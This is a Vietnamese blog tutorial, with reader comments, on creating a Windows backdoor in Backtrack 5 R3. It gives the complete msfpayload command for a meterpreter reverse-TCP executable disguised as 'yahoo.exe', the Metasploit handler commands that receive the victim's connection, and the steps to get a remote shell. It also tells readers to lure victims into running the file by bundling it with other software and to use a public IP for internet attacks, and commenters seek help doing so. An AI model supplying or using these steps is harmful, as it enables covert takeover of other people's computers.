Hướng dẫn tạo virus backdoor trong Backtrack 5 R3 (Clip)

nsa_control_remoto_backdoor

Buồn tình nên ngồi viết tut này và làm clip demo chia sẻ cho anh em, ắt hẳn việc tạo 1 con virus đối với các beginer hoặc IT network không có kiến thức lập trình là 1 điều vô cùng khó, chưa kể nếu lấy các con virus được chia sẻ trên mạng, chúng ta cũng sẽ chẳng biết chúng ta có trở thành nạn nhân của người chủ con virus đó không.

Vì thế, hôm nay mình sẽ hướng dẫn các bạn cách tạo 1 con backdoor  trong Backtrack 1 cách vô cùng đơn giản, không cần kiến thức lập trình gì cả, và con virus này cũng do chính bạn tạo ra nên bạn không phải lo lắng về việc trở thành nạn nhân của ai cả. Trong bài viết này mình chỉ hướng dẫn trong mạng Lan, còn muốn dùng trên internet thì bạn chỉ việc đổi IP private của host thành IP public là được.

Trước hết Backdoor là gì, backdoor đơn giản là  loại virus có tác dụng mở cổng kết nối tới nạn nhân nhằm lấy thông tin cá nhân trên máy nạn nhân hoặc điều khiển máy nạn nhân phục vụ cho việc triển khai tấn công DDos tới các nạn nhân khác. Khi nạn nhân đã thực thi file virus, bạn hầu như có thể chiếm quyền điều khiển toàn diện của máy nạn nhân tùy vào khả năng của bạn.

Trước khi bắt đầu vào làm, mình cũng xin nhắc lại, bài viết mang tính chất thảm khảo và nghiên cứu, vọc phá, không dành cho mục đích xấu, nên mong các bạn cân nhắc trước khi làm chuyện phạm pháp. Và mình sẽ chỉ hỗ trợ cho các bạn đã có kiến thức nhưng làm chưa ra, các câu hỏi vô nghĩa như “bạn hack dùm mình được không, bạn chỉ mình làm với, bạn hướng dẫn chi tiết cho mình với…..bla..bla..bla” thì mình xin phép không trả lời.

Bắt tay vào làm thôi, đầu tiên dùng lệnh ifconfig kiểm tra IP của máy Backtrack, ở đây IP máy backtrack là 192.168.1.4

BACKDOOR1

Tiếp theo, dùng câu lệnh sau để tạo con Backdoor  với tên yahoo.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 x > /root/Desktop/yahoo.exe

SnapCrab_NoName_2014-3-13_21-16-37_No-00

Trong đó, LHOST là địa chỉ IP máy host (backtrack)

LPORT là cổng mà chúng ta kết nối với nạn nhân

Đây là file yahoo.exe mà ta vừa tạo ra

SnapCrab_NoName_2014-3-13_21-19-58_No-00

Giờ ta sẽ bật chế độ lắng nghe để chờ con mồi sập  bẫy thôi, ta chạy 2 câu lệnh sau để chuyển tới thư mục framework để chạy chế độ msfconsole

cd /pentest/exploit/framwork
./msfconsole

SnapCrab_NoName_2014-3-13_21-22-37_No-00

Trong chế độ msfconsole, chúng ta chạy các câu lệnh sau thì bắt đầu mở cổng ngồi đợi..:)

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 4444
set channel 1
exploit

SnapCrab_NoName_2014-3-13_21-25-56_No-00

Giờ mình sẽ gửi file đó qua cho nạn nhân ở máy xp

SnapCrab_NoName_2014-3-13_21-33-59_No-00

Sau khi nạn nhân chạy file yahoo.exe, bên máy backtrack, bạn sẽ thấy chúng ta đã kết nổi tới được máy nạn nhân như trong hình

SnapCrab_NoName_2014-3-13_21-34-52_No-00

Thế là xong rồi đó, mình sẽ sử dụng 1 số câu lệnh để xem máy nạn nhân trong môi trường DOS

sysinfo (để xem thông tin máy nạn nhân)

Shell ( để vào môi trường DOS trên máy nạn nhân)

SnapCrab_NoName_2014-3-13_21-35-56_No-00

Tới đây xem như là bạn đã chiếm được quyền điều khiển của máy nạn nhân rồi đó, chỉ còn tùy thuộc vào khả năng sử dụng DOS của bạn như thế nào thôi.
Còn con virus, bạn tự nghĩ cách làm sao để dụ dỗ nạn nhân click vào nhé, tùy khả năng lừa tình của bạn…^^, ví dụ: bạn có thể combine với 1 phần mềm nào đó.
À, lưu ý, nếu máy nạn nhân có phần mềm diệt virus thì virus ko có tác dụng, nếu bạn muốn vượt mặt được phần mềm diệt virus, hãy chịu khó nghiên cứu thêm, có thời gian mình sẽ viết tut hướng dẫn sau.

Đây là clip làm hoàn chỉnh của mình cho các bạn dễ hình dung.

Chúc các bạn may mắn.

Yahoo: minhtuyen909
Mail: tmtuyen89@gmail.com
My Blog: tran minh tuyen

Advertisements

23 comments on “Hướng dẫn tạo virus backdoor trong Backtrack 5 R3 (Clip)

  1. Pingback: Hướng dẫn tạo website chứa virus trong backtrack | Mr.Lonely

  2. em vọc windows nhiều cũng chán quay sang đây bái ông anh làm sư phụ vậy.em chỉ tìm hiểu mục đích sử dụng căn bản của linux giống như dùng windows nhưng ko ngờ nó lại là một hệ điều hành khủng đến thế ,

  3. Exploit failed: deadlock; recursive locking
    Failed to load client script file: /opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb

  4. Chao Ad, minh dung KaliLinux nen k go tieng Viet dc.
    Cho minh hoi, minh dung KaliLinux nen dung cau lenh “use exploit/multi/handler” khong duoc, minh fix nhu the nao nhi?

  5. Mình sử dụng public IP LPORT 80.
    Sau khi gõ lệnh cuối cùng exploit thì nó hiện.
    handler failed to bind to “my ip public”.
    Bạn có thể giúp mình được không.

  6. Mình để 4444 thì nó vẫn vậy.
    Theo mình tìm hiểu thì phải mở port của modem.
    Không biết có phải do vậy hay không. Bạn có kinh nghiệm hơn chỉ mình với.

  7. anh ơi nếu ip của victim hay attacker bị thay đổi thì làm sao mình có thể tìm được ip để kết nối tới backdoor. CÓ cần phải dung tool scanport để tìm ip dựa trên port của backdoor không anh ?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s